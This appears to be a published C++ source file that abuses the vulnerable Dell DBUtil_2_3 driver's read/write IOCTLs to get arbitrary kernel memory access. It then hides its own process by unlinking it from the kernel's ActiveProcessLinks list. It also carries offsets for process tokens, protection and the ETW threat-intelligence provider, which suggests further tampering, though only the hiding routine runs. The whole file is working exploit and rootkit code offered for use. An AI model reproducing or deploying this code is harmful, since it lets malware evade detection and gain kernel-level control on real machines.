/
HideMyAss.cpp
157 lines (130 loc) · 3.98 KB
/
HideMyAss.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
// HideMyAss.cpp : 此檔案包含 'main' 函式。程式會於該處開始執行及結束執行。
//
#include <iostream>
#include <windows.h>
#include <Psapi.h>
#include "typedefs.h"
HANDLE Device;
CLIENT_ID ourProc;
DWORD64 systemEprocessAddr;
static const DWORD DBUTIL_READ_IOCTL = 0x9B0C1EC4;
static const DWORD DBUTIL_WRITE_IOCTL = 0x9B0C1EC8;
DWORD64 GetKernelBaseAddress() {
DWORD cb = 0;
LPVOID drivers[1024];
if (EnumDeviceDrivers(drivers, sizeof(drivers), &cb)) {
return (DWORD64)drivers[0];
}
return NULL;
}
DWORD ReadPrimitive(DWORD64 Address) {
DBUTIL_READ_BUFFER ReadBuff{};
ReadBuff.Address = Address;
DWORD BytesRead;
DeviceIoControl(Device,
DBUTIL_READ_IOCTL,
&ReadBuff,
sizeof(ReadBuff),
&ReadBuff,
sizeof(ReadBuff),
&BytesRead,
nullptr);
return ReadBuff.value;
}
void WritePrimitive(DWORD64 Address, long long Value) {
DBUTIL_WRITE_BUFFER WriteBuff{};
WriteBuff.Address = Address;
WriteBuff.Value = Value;
DWORD BytesWritten = 0;
DeviceIoControl(Device,
DBUTIL_WRITE_IOCTL,
&WriteBuff,
sizeof(WriteBuff),
&WriteBuff,
sizeof(WriteBuff),
&BytesWritten,
nullptr);
}
BYTE ReadBYTE(DWORD64 Address) {
return ReadPrimitive(Address) & 0xffffff;
}
WORD ReadWORD(DWORD64 Address) {
return ReadPrimitive(Address) & 0xffff;
}
DWORD ReadDWORD(DWORD64 Address) {
return ReadPrimitive(Address);
}
DWORD64 ReadDWORD64(DWORD64 Address) {
return (static_cast<DWORD64>(ReadDWORD(Address + 4)) << 32) | ReadDWORD(Address);
}
void WriteDWORD64(DWORD64 Address, long long Value) {
WritePrimitive(Address, Value);
}
ULONG64 kernelBase;
DWORD64 PsInitialSystemProcess()
{
DWORD64 res = 0;
ULONG64 ntos = (ULONG64)LoadLibrary(L"ntoskrnl.exe");
ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
if (kernelBase) {
res = ReadDWORD64(addr - ntos + kernelBase);
}
return res;
}
class NtoskrnlOffsetsBuild
{
public:
DWORD64 ActiveProcessLinks;
DWORD64 UniqueProcessId;
DWORD64 ThreadListHead;
DWORD64 Protection;
DWORD64 Token;
DWORD64 ObjectTable;
DWORD64 TrapFrame;
DWORD64 Rip;
DWORD64 ThreadListEntry;
DWORD64 Cid;
DWORD64 EtwThreatIntProvRegHandle;
DWORD64 GuidEntry;
DWORD64 EnableInfo;
DWORD64 Guid;
};
NtoskrnlOffsetsBuild Offsets = { 0x448,0x440,0x5e0, 0x87a,0x4b8,0x570, 0x90, 0x168, 0x4e8, 0x478, 0xc19838, 0x20, 0x60, 0x28 };
//pid 4 as stop
DWORD64 LookupEprocessByPid(DWORD64 papaProc, CLIENT_ID procid) {
DWORD64 ActiveProcLinkPointer = papaProc + Offsets.ActiveProcessLinks;
DWORD64 nextFlinkAddr = ReadDWORD64(ActiveProcLinkPointer);
DWORD64 nextEproccess = nextFlinkAddr - Offsets.ActiveProcessLinks;
DWORD64 targetPID = ReadDWORD64(nextEproccess + Offsets.UniqueProcessId);
while (targetPID != (DWORD64)procid.UniqueProcess) {
nextFlinkAddr = ReadDWORD64(nextEproccess + Offsets.ActiveProcessLinks);
nextEproccess = nextFlinkAddr - Offsets.ActiveProcessLinks;
targetPID = ReadDWORD64(nextEproccess + Offsets.UniqueProcessId);
}
return nextEproccess;
}
void HideMyProcess(CLIENT_ID OurProc) {
DWORD64 ourEproc = LookupEprocessByPid(systemEprocessAddr, OurProc);
DWORD64 ourFlink = ReadDWORD64(ourEproc + Offsets.ActiveProcessLinks);
DWORD64 ourBlink = ReadDWORD64(ourEproc + Offsets.ActiveProcessLinks + 0x8);
WriteDWORD64(ourBlink, ourFlink);
WriteDWORD64(ourFlink + 8, ourBlink);
WriteDWORD64(ourEproc + Offsets.ActiveProcessLinks, 0);
WriteDWORD64(ourEproc + Offsets.ThreadListEntry + 0x8, 0);
std::cout << "[#]Cant see me (-john cena)" << std::endl;
}
int main()
{
DWORD64 EtwProvRegHandle;
DWORD64 GUIDRegEntryAddress;
systemEprocessAddr = PsInitialSystemProcess();
DWORD64 ourEproc;
Device = CreateFileW(L"\\\\.\\DBUtil_2_3", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
if (Device == INVALID_HANDLE_VALUE) {
std::cout << "Unable to obtain a handle to the device object: " << GetLastError() << std::endl;
ExitProcess(0);
}
kernelBase = GetKernelBaseAddress();
systemEprocessAddr = PsInitialSystemProcess();
HideMyProcess( CLIENT_ID { (HANDLE)GetCurrentProcessId(), nullptr});
}